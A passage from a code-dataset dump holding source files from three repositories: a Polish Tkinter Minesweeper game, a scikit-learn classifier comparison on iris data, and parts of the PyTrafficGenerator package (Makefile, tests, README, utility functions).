2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord - 1, y_coord] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord + 1, y_coord] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord - 1, y_coord + 1] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord, y_coord + 1] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord + 1, y_coord + 1] and self.buttons[key][2] == 2:\n flag_counter += 1\n\n if flag_counter == button_data[5]:\n key = button_data[3]\n if x_coord > 0 and y_coord > 0 and self.buttons[key-SZEROKOSC-1][2] == 0:\n self.lclicked(self.buttons[key-SZEROKOSC-1])\n if y_coord > 0 and self.buttons[key-SZEROKOSC][2] == 0:\n self.lclicked(self.buttons[key - SZEROKOSC])\n if x_coord < SZEROKOSC-1 and y_coord > 0 and self.buttons[key-SZEROKOSC+1][2] == 0:\n self.lclicked(self.buttons[key - SZEROKOSC+1])\n if x_coord > 0 and self.buttons[key-1][2] == 0:\n self.lclicked(self.buttons[key - 1])\n if x_coord < SZEROKOSC-1 and self.buttons[key+1][2] == 0:\n self.lclicked(self.buttons[key + 1])\n if x_coord > 0 and y_coord < WYSOKOSC-1 and self.buttons[key+SZEROKOSC-1][2] == 0:\n self.lclicked(self.buttons[key + SZEROKOSC - 1])\n if y_coord < WYSOKOSC-1 and self.buttons[key+SZEROKOSC][2] == 0:\n self.lclicked(self.buttons[key + SZEROKOSC])\n if x_coord < SZEROKOSC-1 and y_coord < WYSOKOSC-1 and self.buttons[key+SZEROKOSC+1][2] == 0:\n self.lclicked(self.buttons[key + SZEROKOSC + 1])\n\n def czysc_puste(self, key, allowedClear): # funkcja która w przypadku gdy natrafimy na 0 odkrywa całe jego otoczenie\n if self.buttons[key][2] == 0 and allowedClear == TRUE and self.buttons[key][1] == 0 and key not in self.odwiedzone:\n\n self.odwiedzone.append(key)\n self.buttons[key][2] = 1\n if self.buttons[key][5] == 0:\n self.buttons[key][0].config(image = self.puste)\n else:\n self.buttons[key][0].config(image=self.numery[self.buttons[key][5] - 1])\n\n self.odkrytePola += 1\n\n if self.odkrytePola == WYSOKOSC*SZEROKOSC-LICZBA_MIN:\n self.wygrana()\n\n if self.buttons[key][5] == 0:\n allowedClear = TRUE\n else:\n allowedClear = FALSE\n\n 
x_coord, y_coord = self.buttons[key][4]\n if y_coord > 0 and x_coord > 0:\n self.czysc_puste(key-SZEROKOSC-1, allowedClear)\n if y_coord > 0:\n self.czysc_puste(key-SZEROKOSC, allowedClear)\n if y_coord > 0 and x_coord < SZEROKOSC-1:\n self.czysc_puste(key-SZEROKOSC+1, allowedClear)\n if x_coord > 0:\n self.czysc_puste(key-1, allowedClear)\n if x_coord < SZEROKOSC-1:\n self.czysc_puste(key+1, allowedClear)\n if y_coord < WYSOKOSC-1 and x_coord>0:\n self.czysc_puste(key+SZEROKOSC-1, allowedClear)\n if y_coord < WYSOKOSC-1:\n self.czysc_puste(key+SZEROKOSC, allowedClear)\n if y_coord < WYSOKOSC-1 and x_coord<SZEROKOSC-1:\n self.czysc_puste(key+SZEROKOSC+1, allowedClear)\n\n def przegrana(self):\n self.czyRozpoczeta = FALSE\n self.lista_wynikow[1] += 1\n for key in self.buttons:\n self.buttons[key][0].unbind('<Button-1>')\n self.buttons[key][0].unbind('<Button-3>')\n self.buttons[key][0].unbind('<Double-Button-1>')\n messagebox.showinfo(\"Koniec gry\", \"Przegrałeś!\"\n \"\\nLiczba wygranych: \"+str(self.lista_wynikow[0])+\n \"\\nLiczba przegranych: \"+str(self.lista_wynikow[1]))\n\n for i in range(3):\n self.lista_wynikow[i] = str(self.lista_wynikow[i])\n with open(\"statystyki.txt\", 'w') as statystyki:\n statystyki.write('\\n'.join(self.lista_wynikow))\n\n def wygrana(self):\n self.czyRozpoczeta = FALSE\n self.lista_wynikow[0] += 1\n if self.Czas < self.lista_wynikow[2]: self.lista_wynikow[2] = self.Czas\n for key in self.buttons:\n self.buttons[key][0].unbind('<Button-1>')\n self.buttons[key][0].unbind('<Button-3>')\n self.buttons[key][0].unbind('<Double-Button-1>')\n messagebox.showinfo(\"Koniec gry\", \"Gratulacje, wygrana!\"\n \"\\nLiczba wygranych: \" + str(self.lista_wynikow[0]) +\n \"\\nLiczba przegranych: \" + str(self.lista_wynikow[1]))\n\n for i in range(3):\n self.lista_wynikow[i] = str(self.lista_wynikow[i])\n with open(\"statystyki.txt\", 'w') as statystyki:\n statystyki.write('\\n'.join(self.lista_wynikow))\n\n def update_flags(self):\n self.label3.config(text=\"Pozostało: \" + str(LICZBA_MIN-self.postawioneFlagi))\n\n def timer(self):\n while self.czyRozpoczeta == TRUE:\n self.label2.config(text=\"Czas: \" + str(self.Czas))\n self.Czas += 1\n time.sleep(1)\n\n def reset(self):\n self.lista_wynikow = []\n with open(\"statystyki.txt\", 'r') as statystyki:\n self.lista_wynikow = [int(i) for i in statystyki] # wygrane / przegrane / pocz/ zaaw/ trudny\n\n self.odkrytePola = 0\n self.postawioneFlagi = 0\n self.update_flags()\n self.czyRozpoczeta = FALSE\n self.Czas = 0\n self.odwiedzone = []\n\n self.mapa = Mapa(WYSOKOSC, SZEROKOSC)\n self.mapa.wyznacz_mape(WYSOKOSC, SZEROKOSC, LICZBA_MIN)\n x_coord, y_coord = 0, 0\n for i in range(SZEROKOSC*WYSOKOSC):\n self.buttons[i][0].config(image=self.zakryte)\n self.buttons[i][2] = 0\n self.buttons[i][5] = self.mapa.dane[x_coord][y_coord].sasiedzi\n self.buttons[i][1] = 0\n self.buttons[i][0].bind('<Button-1>', self.lclicked_wrapper(i))\n self.buttons[i][0].bind('<Button-3>', self.rclicked_wrapper(i))\n self.buttons[i][0].bind('<Double-Button-1>', self.dclicked_wrapper(i))\n if self.mapa.dane[x_coord][y_coord].sasiedzi == 9:\n self.buttons[i][1] = 1\n\n x_coord += 1\n if x_coord == SZEROKOSC:\n x_coord = 0\n y_coord += 1\n\n def stats(self):\n if self.czyRozpoczeta == FALSE:\n for i in range(3):\n self.lista_wynikow[i] = int(self.lista_wynikow[i])\n if self.lista_wynikow[0] == 0 and self.lista_wynikow[1] == 0:\n messagebox.showinfo(\"Statystyki\", \"\\nLiczba wygranych: 0\" +\n \"\\nLiczba przegranych: 0\" +\n \"\\nProcent wygranych: 0%\" 
+\n \"\\nNajlepszy czas: brak\")\n elif self.lista_wynikow[0] == 0 and self.lista_wynikow[1] != 0:\n messagebox.showinfo(\"Statystyki\", \"\\nLiczba wygranych: 0\" +\n \"\\nLiczba przegranych: \" + str(self.lista_wynikow[1]) +\n \"\\nProcent wygranych: 0%\" +\n \"\\nNajlepszy czas: brak\")\n else:\n messagebox.showinfo(\"Statystyki\", \"\\nLiczba wygranych: \" + str(self.lista_wynikow[0]) +\n \"\\nLiczba przegranych: \" + str(self.lista_wynikow[1]) +\n \"\\nProcent wygranych: \" + str(int(100*self.lista_wynikow[0]/(self.lista_wynikow[0]+self.lista_wynikow[1]))) + \"%\" +\n \"\\nNajlepszy czas: \" + str(self.lista_wynikow[2]))\n"
},
{
"alpha_fraction": 0.4158986210823059,
"alphanum_fraction": 0.4447004497051239,
"avg_line_length": 42.42499923706055,
"blob_id": "53a87a218e89a3c4d178dd0ff4c7a4fc335a0363",
"content_id": "c4aa8fc3a25c8b42e18efd3c06c409169ff336c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1736,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 40,
"path": "/map.py",
"repo_name": "tfisz/Minesweeper",
"src_encoding": "UTF-8",
"text": "from random import randint\n\nBOMBA: int = 9\n\n\nclass Pole:\n def __init__(self):\n self.sasiedzi = 0\n\n\nclass Mapa(Pole):\n def __init__(self, x, y):\n self.dane = [[Pole() for i in range(x)] for i in range(y)]\n\n def wyznacz_mape(self, x, y, liczba_min):\n while liczba_min > 0:\n pozycja = randint(0, (x * y)-1)\n if self.dane[int(pozycja / x)][pozycja % x].sasiedzi != BOMBA:\n self.dane[int(pozycja/x)][pozycja % x].sasiedzi = BOMBA\n liczba_min -= 1\n\n for i in range(y):\n for j in range(x):\n if self.dane[i][j].sasiedzi == BOMBA:\n if i > 0 and j > 0 and self.dane[i - 1][j - 1].sasiedzi != BOMBA:\n self.dane[i-1][j-1].sasiedzi += 1\n if j > 0 and self.dane[i][j - 1].sasiedzi != BOMBA:\n self.dane[i][j-1].sasiedzi += 1\n if i < y-1 and j > 0 and self.dane[i + 1][j - 1].sasiedzi != BOMBA:\n self.dane[i+1][j-1].sasiedzi += 1\n if i > 0 and self.dane[i - 1][j].sasiedzi != BOMBA:\n self.dane[i-1][j].sasiedzi += 1\n if i < y-1 and self.dane[i + 1][j].sasiedzi != BOMBA:\n self.dane[i+1][j].sasiedzi += 1\n if i > 0 and j < x-1 and self.dane[i - 1][j + 1].sasiedzi != BOMBA:\n self.dane[i-1][j+1].sasiedzi += 1\n if j < x-1 and self.dane[i][j + 1].sasiedzi != BOMBA:\n self.dane[i][j+1].sasiedzi += 1\n if i < y-1 and j < x-1 and self.dane[i + 1][j + 1].sasiedzi != BOMBA:\n self.dane[i+1][j+1].sasiedzi += 1"
}
] | 3 |
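Mapa.wyznacz_mape() above places mines with re-drawn `randint` positions and unrolls the eight neighbour checks by hand. A compact sketch of the same board construction (not from the repo; `random.sample` replaces the collision re-draw loop, and a bounds-checked comprehension replaces the eight explicit `if`s):

```python
from random import sample

BOMB = 9

def make_board(rows, cols, mines):
    board = [[0] * cols for _ in range(rows)]
    # sample() draws distinct cells, so no re-draw on collision is needed
    for pos in sample(range(rows * cols), mines):
        board[pos // cols][pos % cols] = BOMB
    for i in range(rows):
        for j in range(cols):
            if board[i][j] == BOMB:
                continue
            # count mines in the 8-neighbourhood, skipping (0, 0) and out-of-bounds cells
            board[i][j] = sum(
                board[i + di][j + dj] == BOMB
                for di in (-1, 0, 1) for dj in (-1, 0, 1)
                if (di or dj) and 0 <= i + di < rows and 0 <= j + dj < cols)
    return board
```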
naveennvrgup/nns-ml-projects
|
https://github.com/naveennvrgup/nns-ml-projects
|
508b9edb59b764a0364abd0cd5ae630af0f6b8f4
|
b545b3fc90a9acc7264c1fb0e3650a69662ec6b5
|
3150e53b7f0045e2b1d6a074b3b7211dd5c98d8c
|
refs/heads/master
| 2020-04-15T01:38:13.747215 | 2019-11-26T17:23:38 | 2019-11-26T17:23:38 | 164,284,368 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6800947785377502,
"alphanum_fraction": 0.741706132888794,
"avg_line_length": 21.052631378173828,
"blob_id": "7d8c459c5d160d7e0355ac5be6913ae20b8b531f",
"content_id": "7e0dd8805805cb6ee8ebb39a4b4233904cf384f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 19,
"path": "/README.md",
"repo_name": "naveennvrgup/nns-ml-projects",
"src_encoding": "UTF-8",
"text": "# ML Experiments\n\nThis repo is meant to a online backup of the Machine Learning models I experiment with.\n\n### ML Models:\n1. Black friday \n1. cat and dogs \n1. irih flowers \n1. student performence\n\nThe models are trained using keras apis with tensorflow backend.\n\n### My laptop specifications:\ni5-6200U CPU @ 2.3GHz 4 cores \n8GB RAM \n256GB SSD \nNividia 940MX graphics card \n720p screen \nUbuntu 18.0.6 Bionic Beaver \n\n"
},
{
"alpha_fraction": 0.6838955283164978,
"alphanum_fraction": 0.6882480978965759,
"avg_line_length": 28.015872955322266,
"blob_id": "2beb6d297271b4d47ff2fbb66f31c7a11346fb46",
"content_id": "93df6c03f60a7be63986721f3211cf93bb4bd0c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1838,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 63,
"path": "/irih_flowers/irish.py",
"repo_name": "naveennvrgup/nns-ml-projects",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\ndataset = pd.read_csv('irish.txt')\nx=dataset.iloc[:,:3].values\ny=dataset.iloc[:,4].values\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nx=sc.fit_transform(x)\n\n# classifiers \nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import cross_val_score, cross_val_predict\n\ncnames = [\n 'logistic',\n 'kneighbours',\n 'svc',\n 'decisiontree',\n 'randomforest',\n 'adaboost',\n 'gaussiannb',\n 'quadraticdiscriminationanalysis',\n ]\n\ncfiers = [\n LogisticRegression(multi_class='auto',solver='lbfgs'),\n KNeighborsClassifier(),\n SVC(gamma='auto'),\n DecisionTreeClassifier(),\n RandomForestClassifier(n_estimators=100),\n AdaBoostClassifier(),\n GaussianNB(),\n QuadraticDiscriminantAnalysis()\n ]\n\n\nbaccu=0\nbcfier='letssee'\n\nfor i in range(len(cnames)):\n print(cnames[i])\n accs = cross_val_score(cfiers[i],x,y,cv=15)\n print(accs.mean(),accs.std())\n if accs.mean()>baccu:\n baccu=accs.mean()\n bcfier=cnames[i]\n print()\n \nprint('best classifier for the dataset')\nprint(baccu,bcfier)\n \n \n"
},
{
"alpha_fraction": 0.700440526008606,
"alphanum_fraction": 0.7136563658714294,
"avg_line_length": 24.11111068725586,
"blob_id": "ea3976f7e5496665cce318aaf2108b42676d8f76",
"content_id": "b63a3bd91a0dc0f026a7251b2de6103b2449fa0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 227,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 9,
"path": "/.spyproject/workspace.ini",
"repo_name": "naveennvrgup/nns-ml-projects",
"src_encoding": "UTF-8",
"text": "[workspace]\nrestore_data_on_startup = True\nsave_data_on_exit = True\nsave_history = True\nsave_non_project_files = False\n\n[main]\nversion = 0.1.0\nrecent_files = ['C:\\\\Users\\\\naveen\\\\Desktop\\\\ml_projects\\\\irih_flowers\\\\irish.py']\n\n"
}
] | 3 |
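irish.py above scores eight classifiers with 15-fold cross-validation and keeps the one with the best mean accuracy. A condensed, self-contained version of that loop (using scikit-learn's bundled iris data instead of irish.txt, and only two of the models, so it runs anywhere):

```python
from sklearn.datasets import load_iris
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import StandardScaler

x, y = load_iris(return_X_y=True)
x = StandardScaler().fit_transform(x)  # same scaling step as the original script

classifiers = {
    'logistic': LogisticRegression(max_iter=1000),
    'randomforest': RandomForestClassifier(n_estimators=100),
}
# pick the name whose classifier has the highest mean 15-fold CV accuracy
best = max(classifiers,
           key=lambda name: cross_val_score(classifiers[name], x, y, cv=15).mean())
print('best classifier for the dataset:', best)
```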
feng891005/PyTrafficGenerator
|
https://github.com/feng891005/PyTrafficGenerator
|
0fc9d852dd77896729cbfb688579cceffe83fd8e
|
612f838ad6fd6fe65eba5a5ca1c2cc973dc14a29
|
d98ea1ea671813b3abdfc41bd4e46ebb49a756e4
|
refs/heads/master
| 2023-04-05T19:03:47.282278 | 2021-04-19T10:43:41 | 2021-04-19T10:43:41 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6938775777816772,
"alphanum_fraction": 0.7030612230300903,
"avg_line_length": 24.789474487304688,
"blob_id": "540debd6d4125c8a18496e7bdfffe909b90082ce",
"content_id": "4e074f70c5ad0d4ac7e09972e81b61a1765c3969",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 980,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 38,
"path": "/Makefile",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "#\n# Makefile to build and upload to local pypi servers.\n# To upload to pypi.org use plain twine upload.\n#\n# todo: add support to upload to pypi.\n# todo: add support to install from pypi.\n#\n\nrepo=localhost\nuser=pypiadmin\npassword=pypiadmin\n\nhelp:\n\t@echo 'install: install pip requirements'\n\t@echo 'test: test the package'\n\t@echo 'build: build the package'\n\t@echo 'upload: create and upload the package to local pypi index'\n\t@echo ' takes the following params:'\n\t@echo ' repo=repository-url, default localhost:8086'\n\t@echo ' user=user name, default pypiadmin'\n\t@echo ' password=user password, default pypiadmin'\n\ninstall:\n\tpython -m pip install -U pip\n\tpip install -U -r requirements-dev.txt\n\n.PHONY: build\nbuild:\n\tmake test\n\trm -rf dist/*\n\tpython setup.py bdist_wheel\n\nupload:\n\tmake build\n\ttwine upload --repository-url http://$(repo):8036 --user $(user) --password $(password) dist/*\n\ntest:\n\tpytest --cache-clear --flake8 --isort --cov=trafficgenerator\n"
},
{
"alpha_fraction": 0.5763255953788757,
"alphanum_fraction": 0.6004728078842163,
"avg_line_length": 36.01250076293945,
"blob_id": "3b2df995f18d5ff0d263ae86c83d5bfefe641f92",
"content_id": "3ad3e488f028ff77589809dea872c1c325c3db0e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5922,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 160,
"path": "/tests/test_object.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTests for basic TGN object operations.\n\"\"\"\nfrom typing import Dict, List, Type\n\nimport pytest\n\nfrom trafficgenerator.tgn_app import TgnApp\nfrom trafficgenerator.tgn_object import TgnObject, TgnObjectsDict, TgnSubStatsDict\nfrom trafficgenerator.tgn_utils import TgnError, flatten, is_false, is_ip, is_local_host, is_true\n\n\[email protected]()\ndef root():\n \"\"\" Yields dummy objects hierarchy. \"\"\"\n root = TgnTestObject(objRef='root1', objType='root', parent=None)\n root.api = None\n root.logger = None\n root.leaf1 = TgnTestObject(objRef='leaf1', objType='leaf', parent=root)\n root.node1 = TgnTestObject(objRef='node1', objType='node', parent=root, name='name1')\n root.node2 = TgnTestObject(objRef='node2', objType='node', parent=root, name='name2')\n root.node1.node11 = TgnTestObject(objRef='node11', objType='node', parent=root.node1, name='name11')\n root.node1.node12 = TgnTestObject(objRef='node12', objType='node', parent=root.node1, name='name12')\n root.node1.leaf11 = TgnTestObject(objRef='leaf11', objType='leaf', parent=root.node1)\n yield root\n\n\nclass TgnTestObject(TgnObject):\n \"\"\" Mock test object. \"\"\"\n\n def get_attributes(self) -> Dict[str, str]:\n \"\"\" Returns object data as its attributes. \"\"\"\n return self._data\n\n def get_attribute(self, attribute: str) -> str:\n \"\"\" Returns single data entry as a single attribute. \"\"\"\n return self._data[attribute]\n\n def get_children(self, *types: List[str]) -> List[TgnObject]:\n \"\"\" Returns all objects as children. \"\"\"\n return list(self.objects.values())\n\n def _create(self, **attributes: Dict[str, object]) -> str:\n \"\"\" todo: add implementation and test. \"\"\"\n pass\n\n def get_name(self) -> str:\n \"\"\" todo: add implementation and test. \"\"\"\n pass\n\n def get_objects_from_attribute(self, attribute: str) -> List[TgnObject]:\n \"\"\" todo: add implementation and test. \"\"\"\n pass\n\n def get_obj_class(self, obj_type: str) -> Type[TgnObject]:\n \"\"\" todo: add implementation and test. \"\"\"\n pass\n\n\nclass TestTgnObject:\n\n def test_app(self):\n TgnApp(None, None)\n\n def test_objects_tree(self, root):\n \"\"\" Test object search operations. 
\"\"\"\n\n assert root.ref == 'root1'\n assert root.type == 'root'\n assert root.name == 'root1'\n assert root.node1.ref == 'node1'\n assert root.node1.type == 'node'\n assert root.node1.name == 'name1'\n assert root.node1.parent == root\n\n assert root.get_object_by_name('name2') == root.node2\n assert len(root.get_objects_by_type('node')) == 2\n assert len(root.get_objects_or_children_by_type('node')) == 2\n assert root.get_object_or_child_by_type('node') == root.node1\n assert root.get_object_by_type('node') == root.node1\n assert len(root.get_objects_by_type('no_such_object')) == 0\n assert root.get_object_by_ref('leaf1') == root.leaf1\n\n assert len(root.get_objects_by_type_in_subtree('node')) == 4\n assert len(root.get_objects_by_type_in_subtree('leaf')) == 2\n assert len(root.node1.node11.get_objects_by_type_in_subtree('node')) == 0\n\n assert str(root) == root.name\n\n assert len(root.get_objects_with_attribute(obj_type='node', attribute='name', value='name1')) == 1\n\n assert len(root.get_children()) == 3\n assert root.get_child() == root.leaf1\n\n def test_objects_dict(self, root):\n objects_dict = TgnObjectsDict()\n objects_dict[root.node1] = TgnObjectsDict()\n objects_dict[root.node1][root.node1.node11] = 'node 11 entry'\n objects_dict[root.node1][root.node1.node12] = 'node 12 entry'\n objects_dict[root.node1][root.node1.leaf11] = TgnObjectsDict()\n objects_dict[root.node2] = 'node 2 entry'\n with pytest.raises(TgnError) as _:\n objects_dict.__setitem__('invalid key', '')\n assert objects_dict[root.node2] == 'node 2 entry'\n assert objects_dict[root.node2.name] == 'node 2 entry'\n assert objects_dict[root.node2.ref] == 'node 2 entry'\n print(objects_dict.dumps())\n\n def test_sub_dict(self, root):\n sub_stats_dict = TgnSubStatsDict()\n sub_stats_dict[root.node1] = {'a': 1, 'b': 2}\n assert sub_stats_dict[root.node1]['a'] == 1\n assert sub_stats_dict[root.node1.name]['a'] == 1\n assert sub_stats_dict['a'] == 1\n sub_stats_dict[root.node2] = {'c': 3, 'd': 4}\n assert sub_stats_dict[root.node1]['a'] == 1\n assert sub_stats_dict[root.node2]['c'] == 3\n with pytest.raises(KeyError) as _:\n sub_stats_dict.__getitem__('a')\n\n\nclass TestTgnUtils:\n\n def test_true_false(self):\n \"\"\" Test TGN true and false values. \"\"\"\n\n for false_stc in ('False', 'false', '0', 'null', 'NONE', 'none', '::ixnet::obj-null'):\n assert(is_false(false_stc))\n assert(not is_true(false_stc))\n\n for true_str in ('True', 'TRUE', '1'):\n assert(is_true(true_str))\n assert(not is_false(true_str))\n\n def test_localhost(self):\n \"\"\" Test TGN localhost values. \"\"\"\n\n for location in ('127.0.0.1', 'localhost', 'Localhost/1/1', '//(Offline)/1/1', 'null'):\n assert(is_local_host(location))\n\n for location in ('1.2.3.4', 'hostname', '192.168.1.1/1/2'):\n assert(not is_local_host(location))\n\n def test_ips(self):\n \"\"\" Test TGN IP values. \"\"\"\n\n for ip in ('IPV4', 'ipv6', 'ipv4if', 'IPV6IF'):\n assert(is_ip(ip))\n\n for ip in ('mac', 'bla'):\n assert(not is_ip(ip))\n\n def test_flatten(self):\n nl = [1, [11, [111]], 2, [22]]\n assert(len(nl) == 4)\n assert(type(nl[1]) == list)\n assert(type(nl[2]) == int)\n assert(len(flatten(nl)) == 5)\n assert(type(flatten(nl)[1]) == int)\n assert(type(flatten(nl)[2]) == int)\n"
},
{
"alpha_fraction": 0.7247191071510315,
"alphanum_fraction": 0.7407704591751099,
"avg_line_length": 31.789474487304688,
"blob_id": "167253871fec16f309aebc7971eef04fb056e791",
"content_id": "017de7b5651ae216adecf8a88fe5ed6523361f33",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1246,
"license_type": "permissive",
"max_line_length": 161,
"num_lines": 38,
"path": "/README.md",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "[](https://www.python.org/downloads/release/downloads/)\n[](https://opensource.org/licenses/Apache-2.0)\n\n\nBase Python OO API for traffic generators (Ixia, Spirent, Xena, TRex etc.).\n\nThe package provides\n\n- Common utilities.\n- Base class for all Python OO traffic generator classes.\n- Base Python wrapper over Tcl - the lowest common denominator API for TGNs is Tcl (also the inheriting packages still have some legacy code implemented in Tcl).\n\nUsers\n-----\nTo install pytrafficgen for users, just pip install it::\n\n $ pip install pytrafficgen\n\nDevelopers\n----------\nTo get pytrafficgen for developers, just clone it\n\n```bash\n$ git clone https://github.com/shmir/PyTrafficGenerator.git\n```\n\nTo upload a new version to local pypi::\n```bash\n$ make upload repo=REPO user=USER_NAME password=PASSWORD\n```\n\nDocumentation\n-------------\nhttp://pytrafficgenerator.readthedocs.io/en/latest/\n\nContact\n-------\nFeel free to contact me with any question or feature request at [email protected]\n"
},
{
"alpha_fraction": 0.6266094446182251,
"alphanum_fraction": 0.6364193558692932,
"avg_line_length": 26.644067764282227,
"blob_id": "dccfede5fcb0442484738dcecfcca9a4c503e79b",
"content_id": "fa9bc263147513d66c07abc5f69a48a11db39014",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1631,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 59,
"path": "/tests/test_tcl.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTests for TGN Tcl wrapper - the default wrapper.\n\"\"\"\nimport pytest\n\nfrom trafficgenerator.tgn_tcl import TgnTclWrapper, TgnTkThread, py_list_to_tcl_list, tcl_file_name, tcl_list_2_py_list\n\n\[email protected]\ndef tcl(logger):\n yield TgnTclWrapper(logger)\n\n\[email protected]\ndef multi_thread_tcl(logger):\n tcl_interp = TgnTkThread()\n tcl_interp.start()\n yield TgnTclWrapper(logger, tcl_interp)\n tcl_interp.stop()\n\n\ndef test_list(tcl):\n \"\"\" Test Python->Tcl and Tcl->Python list conversion. \"\"\"\n\n py_list = [\"a\", \"b b\"]\n tcl_list_length = tcl.eval(\"llength \" + py_list_to_tcl_list(py_list))\n assert int(tcl_list_length) == 2\n\n tcl_list = \"{a} {b b}\"\n python_list = tcl_list_2_py_list(tcl_list)\n assert len(python_list) == 2\n assert type(python_list[0]) is str\n assert type(python_list[1]) is str\n\n tcl_list = \"{{a} {b b}}\"\n python_list = tcl_list_2_py_list(tcl_list)\n assert len(python_list) == 2\n assert type(python_list[0]) is str\n assert type(python_list[1]) is str\n\n tcl_list = \"\"\n assert len(tcl_list_2_py_list(tcl_list)) == 0\n\n tcl_list = \"{}\"\n assert len(tcl_list_2_py_list(tcl_list)) == 0\n\n tcl_list = '[[\"a\"], [\"b\", \"b\"]]'\n assert len(tcl_list_2_py_list(tcl_list)) == 2\n\n\ndef test_file_name():\n \"\"\" Test Tcl file names normalization. \"\"\"\n assert tcl_file_name(\"a\\\\b/c\").strip() == \"{a/b/c}\"\n\n\[email protected](\"Throws Tcl_AsyncDelete: async handler deleted by the wrong thread which fails tox.\")\ndef test_puts(multi_thread_tcl):\n \"\"\" Test multi threaded Tcl \"\"\"\n assert multi_thread_tcl.eval('set dummy \"hello world\"') == \"hello world\"\n"
},
{
"alpha_fraction": 0.6583427786827087,
"alphanum_fraction": 0.6654369831085205,
"avg_line_length": 28.86440658569336,
"blob_id": "675eb563573edff55a360e8efb42fbd8528d36b2",
"content_id": "b65bc717ce7715bc7b346b81ace1769b1ad5456c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3524,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 118,
"path": "/trafficgenerator/tgn_utils.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTGN projects utilities and errors.\n\"\"\"\nimport importlib.util\nimport logging\nfrom collections.abc import Iterable\nfrom enum import Enum\nfrom os import path\nfrom types import ModuleType\nfrom typing import Optional\n\n\nclass ApiType(Enum):\n \"\"\" List TGN API types. \"\"\"\n\n tcl = 1\n python = 2\n rest = 3\n socket = 4\n\n\nclass TgnError(Exception):\n \"\"\" Base exception for traffic generator exceptions. \"\"\"\n\n pass\n\n\ndef flatten(x: list) -> list:\n \"\"\"Recursievely flatten embedded list into single list.\n\n :param x: list to flatten.\n \"\"\"\n if isinstance(x, Iterable):\n return [a for i in x for a in flatten(i)]\n else:\n return [x]\n\n\ndef is_true(str_value: str) -> bool:\n \"\"\"Returns True if string represents True value else return False.\n\n :param str_value: String to evaluate.\n \"\"\"\n return str_value.lower() in (\"true\", \"yes\", \"1\", \"::ixnet::ok\")\n\n\ndef is_false(str_value: str) -> bool:\n \"\"\"Returns True if string represents False value else return True.\n\n :param str_value: String to evaluate.\n \"\"\"\n return str_value.lower() in (\"false\", \"no\", \"0\", \"null\", \"none\", \"::ixnet::obj-null\")\n\n\ndef is_local_host(location: str) -> bool:\n \"\"\"Returns True if ip represents localhost or offline else return False.\n\n :param location: Location string in the format ip[/slot[/port]].\n \"\"\"\n return any(x in location.lower() for x in (\"localhost\", \"127.0.0.1\", \"offline\", \"null\"))\n\n\ndef is_ipv4(str_value: str) -> bool:\n \"\"\"Returns True if string represents IPv4 else return False.\n\n :param str_value: String to evaluate.\n \"\"\"\n return str_value.lower() in (\"ipv4\", \"ipv4if\")\n\n\ndef is_ipv6(str_value: str) -> bool:\n \"\"\"Returns True if string represents IPv6 else return False.\n\n :param str_value: String to evaluate.\n \"\"\"\n return str_value.lower() in (\"ipv6\", \"ipv6if\")\n\n\ndef is_ip(str_value: str) -> bool:\n \"\"\"Returns True if string represents and IP address (either IPv4 or IPv6), else False.\n\n :param str str_value: String to evaluate.\n \"\"\"\n return is_ipv4(str_value) or is_ipv6(str_value)\n\n\ndef new_log_file(logger, suffix: str, file_type: Optional[str] = \"tcl\") -> logging.Logger:\n \"\"\"Create new logger and log file from existing logger.\n\n The new logger will be create in the same directory as the existing logger file and 